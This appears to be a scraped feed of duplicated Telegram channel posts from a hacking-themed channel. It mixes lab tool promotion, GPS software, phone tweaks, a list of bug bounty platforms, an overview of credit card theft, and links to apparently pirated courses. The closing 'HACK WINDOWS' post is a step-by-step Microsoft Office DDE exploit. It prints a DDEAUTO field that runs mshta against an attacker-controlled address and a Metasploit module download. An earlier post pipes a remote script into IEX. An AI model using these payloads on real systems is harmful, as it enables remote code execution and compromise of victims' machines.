β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π΅οΈ vulnerable-AD: create your own vulnerable active directory :
β-Vulnerable-ADβ-
1) Create a vulnerable active directory that allows you to test most AD attacks on a local bench.
F E A T U R E S :
Main characteristics
Randomized attacks
Full coverage of known attacks
You need to run the script on a DC with Active Directory installed
Some of the attacks require a client workstation
Supported attacks
Abusing ACLs / ACEs
Kerberoasting
AS-REP Roasting
Abuse DnsAdmins
Password in the AD User comment
Password spraying
DCSync
Silver Ticket
Golden Ticket
Pass-the-Hash
Pass-the-Ticket
SMB Signing Disabled
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
2) git clone https://github.com/WazeHell/vulnerable-AD.git
Example
#
3) if you have not installed Active Directory yet, you can try if you have already installed Active Directory, just run the script
4) Install-ADDSForest -CreateDnsDelegation:$false -DatabasePath "C:\Windows\NTDS" -DomainMode "7" -DomainName "cs.org" -DomainNetbiosName "cs" -ForestMode "7" -InstallDns:$true -LogPath "C:\Windows\NTDS" -NoRebootOnCompletion:$false -SysvolPath "C:\Windows\SYSVOL" -Force:$true
5) #
!
IEX((new-object net.webclient).downloadstring("https://raw.githubusercontent.com/wazehell/vulnerable-AD/master/vulnad.ps1"));
Invoke-VulnAD -UsersLimit 100 -DomainName "cs.org"
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π΅οΈ vulnerable-AD: create your own vulnerable active directory :
β-Vulnerable-ADβ-
1) Create a vulnerable active directory that allows you to test most AD attacks on a local bench.
F E A T U R E S :
Main characteristics
Randomized attacks
Full coverage of known attacks
You need to run the script on a DC with Active Directory installed
Some of the attacks require a client workstation
Supported attacks
Abusing ACLs / ACEs
Kerberoasting
AS-REP Roasting
Abuse DnsAdmins
Password in the AD User comment
Password spraying
DCSync
Silver Ticket
Golden Ticket
Pass-the-Hash
Pass-the-Ticket
SMB Signing Disabled
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
2) git clone https://github.com/WazeHell/vulnerable-AD.git
Example
#
3) if you have not installed Active Directory yet, you can try if you have already installed Active Directory, just run the script
4) Install-ADDSForest -CreateDnsDelegation:$false -DatabasePath "C:\Windows\NTDS" -DomainMode "7" -DomainName "cs.org" -DomainNetbiosName "cs" -ForestMode "7" -InstallDns:$true -LogPath "C:\Windows\NTDS" -NoRebootOnCompletion:$false -SysvolPath "C:\Windows\SYSVOL" -Force:$true
5) #
!
IEX((new-object net.webclient).downloadstring("https://raw.githubusercontent.com/wazehell/vulnerable-AD/master/vulnad.ps1"));
Invoke-VulnAD -UsersLimit 100 -DomainName "cs.org"
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - safebuffer/vulnerable-AD: Create a vulnerable active directory that's allowing you to test most of the active directoryβ¦
Create a vulnerable active directory that's allowing you to test most of the active directory attacks in a local lab - GitHub - safebuffer/vulnerable-AD: Create a vulnerable active directo...
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦FOR LINUX GPS TRACKING SOFTWARE :
Viking β GPS data editor and analyzer
Viking aims to be an easy to use, yet powerful in accomplishing, a wide variety of GPS related tasks. It uses a hierarchical layering system to organize GPS data, maps, and other layer types with spatial data, such as coordinate lines.
π²F E A T U R E S :
Uploading and downloading waypoints, tracks to/from GPS.
Realtime GPS tracking and track recording.
Preparing tracks and waypoints for trips using maps from
services such as Googlemaps, Terrasever. You only need to
upload the data to your GPS before you leave. The maps together with your tracks and waypoints can also be printed and used during the trip.
After trips, tracks and waypoints from GPS can be downloaded, stored, managed and reused in later trips.
Analyzing OHV and hiking trips, understanding where you went and how far you were from something.
Making waypoints and tracks to follow to easily get someplace you have not been to or do not have GPS data for but Terraserver maps exist for it.
Making maps with coordinate lines.
Analyzing speed at different places, adding waypoints where you forgot to mark one but did slow down or stop.
Grouping data from multiple trips using a hierarchical data manager.
Show the live GPS position on the map (for use on a mobile device β e.g. a laptop).
Layers supported:
Aggregate β a container layer to hold other layers. This layer type is useful for grouping other layers, especially TrackWaypoint layers.
TrackWaypoint β displays GPS data (tracks and waypoints).
GPS β responsible for uploading and downloading GPS data from a GPS device. It also is responsible for realtime GPS tracking.
DEM β provides elevation data from the Shuttle Radar Topography Mission (SRTM).
Coord β allows drawing of grid lines on the viewport.
GeoRef β allows users to use any image as a map.
Maps β provides a single map resource, you may have multiple map layers but only top one (if enabled) will be visible. Inbuilt maps include:
Terraserver Topos.
Terraserver Aerials.
Terraserver Urban Areas.
OpenStreetMap (Osmarender).
OpenStreetMap (Mapnik).
OpenStreetMap (Maplint).
OpenStreetMap (Cycle).
NASA BlueMarble.
SpotMap (Viking Version1.1+).
Supports a wide variety of map types including WMS, OSM, TMS, SPOTMaps.
Support for Locosys and DeLorme GPS devices.
Internationalization support.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
FOR BSD Windows Mac Linux:)
sourceforge.net/projects/viking
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦FOR LINUX GPS TRACKING SOFTWARE :
Viking β GPS data editor and analyzer
Viking aims to be an easy to use, yet powerful in accomplishing, a wide variety of GPS related tasks. It uses a hierarchical layering system to organize GPS data, maps, and other layer types with spatial data, such as coordinate lines.
π²F E A T U R E S :
Uploading and downloading waypoints, tracks to/from GPS.
Realtime GPS tracking and track recording.
Preparing tracks and waypoints for trips using maps from
services such as Googlemaps, Terrasever. You only need to
upload the data to your GPS before you leave. The maps together with your tracks and waypoints can also be printed and used during the trip.
After trips, tracks and waypoints from GPS can be downloaded, stored, managed and reused in later trips.
Analyzing OHV and hiking trips, understanding where you went and how far you were from something.
Making waypoints and tracks to follow to easily get someplace you have not been to or do not have GPS data for but Terraserver maps exist for it.
Making maps with coordinate lines.
Analyzing speed at different places, adding waypoints where you forgot to mark one but did slow down or stop.
Grouping data from multiple trips using a hierarchical data manager.
Show the live GPS position on the map (for use on a mobile device β e.g. a laptop).
Layers supported:
Aggregate β a container layer to hold other layers. This layer type is useful for grouping other layers, especially TrackWaypoint layers.
TrackWaypoint β displays GPS data (tracks and waypoints).
GPS β responsible for uploading and downloading GPS data from a GPS device. It also is responsible for realtime GPS tracking.
DEM β provides elevation data from the Shuttle Radar Topography Mission (SRTM).
Coord β allows drawing of grid lines on the viewport.
GeoRef β allows users to use any image as a map.
Maps β provides a single map resource, you may have multiple map layers but only top one (if enabled) will be visible. Inbuilt maps include:
Terraserver Topos.
Terraserver Aerials.
Terraserver Urban Areas.
OpenStreetMap (Osmarender).
OpenStreetMap (Mapnik).
OpenStreetMap (Maplint).
OpenStreetMap (Cycle).
NASA BlueMarble.
SpotMap (Viking Version1.1+).
Supports a wide variety of map types including WMS, OSM, TMS, SPOTMaps.
Support for Locosys and DeLorme GPS devices.
Internationalization support.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
FOR BSD Windows Mac Linux:)
sourceforge.net/projects/viking
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
SourceForge
Viking GPS data editor and analyzer
Download Viking GPS data editor and analyzer for free. Viking is a free/open source program to manage GPS data. Viking is a free/open source program to manage GPS data. You can import, plot and create tracks, routes and waypoints, show OSM, Bing Aerial andβ¦
10 h trading ninja https://mega.nz/folder/il9QCQiQ#UqHjrlyI9hlsQs1zXbE5CQ
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Manual switching to different LTE frequency bands on any Samsung Galaxy smartphones :
1) Download QuickShortCutMaker
Download and install the free QuickShortCutMaker app from the Google Play Store .
https://play.google.com/store/apps/details?id=com.sika524.android.quickshortcut&hl=en
2)Select a new LTE band
After installation, launch the application and open the "Activity" tab. Click on the down arrow next to Call Settings. In the list, select the last option above "Camera" and click "Try".
3) On a new page, open the side menu by clicking on the three horizontal lines in the upper left corner. Click Select Lane.
4) you will see a list of all the bands supported by the smartphone, including LTE and 5G. You need to select the LTE band supported by your mobile operator. For the USA, these are the following operators and bands:
Verizon: 0/1/2/4/5/13
AT&T: 2/4/5/12/17
T-Mobile / Sprint: 2/4/5/12/25/26/41
US Cellular: 2/4/5/12
5) When you have selected a supported LTE band, activate the Select switch in the upper right corner. Use the Back button or gesture to return to the previous screen. To verify that the change worked, it is recommended that you restart your smartphone.
6) Approve the change
Download the Network Cell Info Lite app from the Google Play store.
https://play.google.com/store/apps/details?id=com.novvia.fispy&hl=en
7) After installation, launch the application and give the required permissions. The first Gauge tab on the right shows the selected frequency band.
Don't clone our tutorials :)
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Manual switching to different LTE frequency bands on any Samsung Galaxy smartphones :
1) Download QuickShortCutMaker
Download and install the free QuickShortCutMaker app from the Google Play Store .
https://play.google.com/store/apps/details?id=com.sika524.android.quickshortcut&hl=en
2)Select a new LTE band
After installation, launch the application and open the "Activity" tab. Click on the down arrow next to Call Settings. In the list, select the last option above "Camera" and click "Try".
3) On a new page, open the side menu by clicking on the three horizontal lines in the upper left corner. Click Select Lane.
4) you will see a list of all the bands supported by the smartphone, including LTE and 5G. You need to select the LTE band supported by your mobile operator. For the USA, these are the following operators and bands:
Verizon: 0/1/2/4/5/13
AT&T: 2/4/5/12/17
T-Mobile / Sprint: 2/4/5/12/25/26/41
US Cellular: 2/4/5/12
5) When you have selected a supported LTE band, activate the Select switch in the upper right corner. Use the Back button or gesture to return to the previous screen. To verify that the change worked, it is recommended that you restart your smartphone.
6) Approve the change
Download the Network Cell Info Lite app from the Google Play store.
https://play.google.com/store/apps/details?id=com.novvia.fispy&hl=en
7) After installation, launch the application and give the required permissions. The first Gauge tab on the right shows the selected frequency band.
Don't clone our tutorials :)
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE COMMUNITY
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ Best Bug Bounty Platforms :
- YesWeHack
- intigriti
- HackerOne
- Bugcrowd
- Cobalt
- Bountysource
- Bounty Factory
- Coder Bounty
- FreedomSponsors
- FOSS Factory
- Synack
- HackenProof
- Detectify
- Bugbountyjp
- Safehats
- BugbountyHQ
- Hackerhive
- Hacktrophy
- AntiHACK
- CESPPA
β git 2020
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ Best Bug Bounty Platforms :
- YesWeHack
- intigriti
- HackerOne
- Bugcrowd
- Cobalt
- Bountysource
- Bounty Factory
- Coder Bounty
- FreedomSponsors
- FOSS Factory
- Synack
- HackenProof
- Detectify
- Bugbountyjp
- Safehats
- BugbountyHQ
- Hackerhive
- Hacktrophy
- AntiHACK
- CESPPA
β git 2020
β β β Uππ»βΊπ«Δπ¬πβ β β β
YesWeHack
Global Bug Bounty & Vulnerability Management Platform | YesWeHack
Explore YesWeHack, leading global Bug Bounty & Vulnerability Management Platform. Connect with tens of thousands of ethical hackers worldwide to uncover vulnerabilities in your websites, mobile apps, and digital infrastructure, bolstering your cyber defenceβ¦
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π« A look at how credit card information can be stolen :
1) Cloning maps
Making a cloned credit card is the easiest way for a thief to spend someone else's money.
All they have to do is temporarily access your credit card (often in fractions of a minute) and program it onto another prepaid card.
The cloned cards can then be sold on the darknet, usually through cryptocurrency.
Many of these stolen cards resemble real cards, and the attention to detail is mind-boggling.
2) Skimming cards
Breathing in the neck of credit card cloning, ATM skimming is one of the most common ways to get credit and debit card data.
It typically uses magnetic stripe cards rather than chip and pin code cards, but as the story suggests, thieves can also install a mini camera on the skimmer to capture the pin number.
3) Formjacking
The digital equivalent of ATM skimming, "formjacking" is a term Symantec uses to refer to hackers who steal credit card information from checkout pages on websites.
They usually install malicious software, usually JavaScript code, to remove credit card numbers.
Cryptojacking is another similar term that refers to the withdrawal of cryptocurrency
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π« A look at how credit card information can be stolen :
1) Cloning maps
Making a cloned credit card is the easiest way for a thief to spend someone else's money.
All they have to do is temporarily access your credit card (often in fractions of a minute) and program it onto another prepaid card.
The cloned cards can then be sold on the darknet, usually through cryptocurrency.
Many of these stolen cards resemble real cards, and the attention to detail is mind-boggling.
2) Skimming cards
Breathing in the neck of credit card cloning, ATM skimming is one of the most common ways to get credit and debit card data.
It typically uses magnetic stripe cards rather than chip and pin code cards, but as the story suggests, thieves can also install a mini camera on the skimmer to capture the pin number.
3) Formjacking
The digital equivalent of ATM skimming, "formjacking" is a term Symantec uses to refer to hackers who steal credit card information from checkout pages on websites.
They usually install malicious software, usually JavaScript code, to remove credit card numbers.
Cryptojacking is another similar term that refers to the withdrawal of cryptocurrency
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Change the default microphone in AirPods to the ear you want :
1) AirPods are not only a great way to listen to music on your iPhone, but they also help with phone calls, video conferencing, taking voice notes and audio messages, talking to Siri, and more.
2) The two earbuds each have a built-in microphone, but they are not used at the same time. Headphones are selected automatically. If you want to set yourself on which side to use the earphone, you can do it.
3) AirPods 1st and 2nd generation and AirPods Pro usually have a handy microphone for phone and video calls. Most users will be happy with the default choice. If the interlocutors do not hear you well, the Siri assistant does not recognize your words and voice recordings are indistinct, you can manually change the microphone.
4) If you only use one AirPod, the microphone on it is used. Thus, to change the microphone, you need to change the earpiece. If you have both headphones connected to your iPhone, open the Settings app and tap Bluetooth. You can also use the shortcut in the control center. Click the (i) icon next to AirPods under My Devices.
5) By default, AirPods will automatically select one microphone if both are connected. If you want to make your own choice, click on the Microphone field and change from Auto Switch AirPods to Always Left AirPod or Always Right AirPod.
6) AirPods have other customizations as well. You can change the functions by double tapping and long pressing, change the name of the headphones, turn off automatic ear recognition so that the sound is not paused.
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Change the default microphone in AirPods to the ear you want :
1) AirPods are not only a great way to listen to music on your iPhone, but they also help with phone calls, video conferencing, taking voice notes and audio messages, talking to Siri, and more.
2) The two earbuds each have a built-in microphone, but they are not used at the same time. Headphones are selected automatically. If you want to set yourself on which side to use the earphone, you can do it.
3) AirPods 1st and 2nd generation and AirPods Pro usually have a handy microphone for phone and video calls. Most users will be happy with the default choice. If the interlocutors do not hear you well, the Siri assistant does not recognize your words and voice recordings are indistinct, you can manually change the microphone.
4) If you only use one AirPod, the microphone on it is used. Thus, to change the microphone, you need to change the earpiece. If you have both headphones connected to your iPhone, open the Settings app and tap Bluetooth. You can also use the shortcut in the control center. Click the (i) icon next to AirPods under My Devices.
5) By default, AirPods will automatically select one microphone if both are connected. If you want to make your own choice, click on the Microphone field and change from Auto Switch AirPods to Always Left AirPod or Always Right AirPod.
6) AirPods have other customizations as well. You can change the functions by double tapping and long pressing, change the name of the headphones, turn off automatic ear recognition so that the sound is not paused.
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
Vilppu studio Drawing anatomy lecture: https://mega.nz/folder/RIx3TJxJ#_Nna8t01kPxENJ8KSzXqwg/folder/EUJHgKAZ
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦TWRP Alternative Lets Manage Magisk Modules on OnePlus Devices :
Installing Sky Hawk Recovery on OnePlus
Before using Sky Hawk Recovery on OnePlus, you need to install TWRP
After installing TWRP, you can download the Sky Hawk installation file from one of the links below. Place the file in a convenient location on your device, such as the Downloads folder.
https://sourceforge.net/projects/ab-temp/files/SHRP/enchilada/SHRP_v2.3_enchilada-190630062020.zip/download
https://sourceforge.net/projects/ab-temp/files/SHRP/fajita/SHRP_v2.3_fajita-190630062020.zip/download
https://sourceforge.net/projects/ab-temp/files/SHRP/guacamole/SHRP_v2.3_guacamole-190630062020.zip/download
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦TWRP Alternative Lets Manage Magisk Modules on OnePlus Devices :
Installing Sky Hawk Recovery on OnePlus
Before using Sky Hawk Recovery on OnePlus, you need to install TWRP
After installing TWRP, you can download the Sky Hawk installation file from one of the links below. Place the file in a convenient location on your device, such as the Downloads folder.
https://sourceforge.net/projects/ab-temp/files/SHRP/enchilada/SHRP_v2.3_enchilada-190630062020.zip/download
https://sourceforge.net/projects/ab-temp/files/SHRP/fajita/SHRP_v2.3_fajita-190630062020.zip/download
https://sourceforge.net/projects/ab-temp/files/SHRP/guacamole/SHRP_v2.3_guacamole-190630062020.zip/download
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACK WINDOWS
βοΈοΈ Windows Penetration Testing Using Microsoft Office DDE Exploit (MACROLESS):
DDE exploitation was also known as dynamic data exchange, it allows data to be transferred between applications without any user interaction.
1) Hackers have used this technique to execute malicious scripts to compromise data.
2) This was reported to Microsoft by Sensepost, Etienne Stalmans and Saif El-Sherei, but this has not been fixed as many applications use the DDE protocol.
3) This exploit does not require a macro feature to be enabled.
Prerequisites - DDE exploit
Windows machine
Microsoft Office (any version)
Kali Linux
4) We will have to import the Metasploit exploit.
Download it from GitHub using the terminal command:
wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb
5) Move the script to the Metasploit location
mv dde_delivery.rb / usr / share / metasploit-framework / modules / exploits / windows /
6) Now enter msfconsole in the terminal that starts the Metasploit framework and enter reload_all to load modules.
This exploit uses the dde function to deliver the hta payload. Now enter:
7) we need to set up a payload listener.
Don't use port 8080 as the server port is set to 8080 by default
8) Now copy and paste the code into any text document.
9) We used Office 365 Pro Plus, completely revamped.
10) Find the formula and you should see a small error window in your document, then right click on the toggle code.
11) paste the command into the document in parentheses.
Save your document.
{DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe βhttp://192.168.177.141:8080/mVg3YDU3gVQβ}
Β― \ _ (γ) _ / Β―
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACK WINDOWS
βοΈοΈ Windows Penetration Testing Using Microsoft Office DDE Exploit (MACROLESS):
DDE exploitation was also known as dynamic data exchange, it allows data to be transferred between applications without any user interaction.
1) Hackers have used this technique to execute malicious scripts to compromise data.
2) This was reported to Microsoft by Sensepost, Etienne Stalmans and Saif El-Sherei, but this has not been fixed as many applications use the DDE protocol.
3) This exploit does not require a macro feature to be enabled.
Prerequisites - DDE exploit
Windows machine
Microsoft Office (any version)
Kali Linux
4) We will have to import the Metasploit exploit.
Download it from GitHub using the terminal command:
wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb
5) Move the script to the Metasploit location
mv dde_delivery.rb / usr / share / metasploit-framework / modules / exploits / windows /
6) Now enter msfconsole in the terminal that starts the Metasploit framework and enter reload_all to load modules.
This exploit uses the dde function to deliver the hta payload. Now enter:
7) we need to set up a payload listener.
Don't use port 8080 as the server port is set to 8080 by default
8) Now copy and paste the code into any text document.
9) We used Office 365 Pro Plus, completely revamped.
10) Find the formula and you should see a small error window in your document, then right click on the toggle code.
11) paste the command into the document in parentheses.
Save your document.
{DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe βhttp://192.168.177.141:8080/mVg3YDU3gVQβ}
Β― \ _ (γ) _ / Β―
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β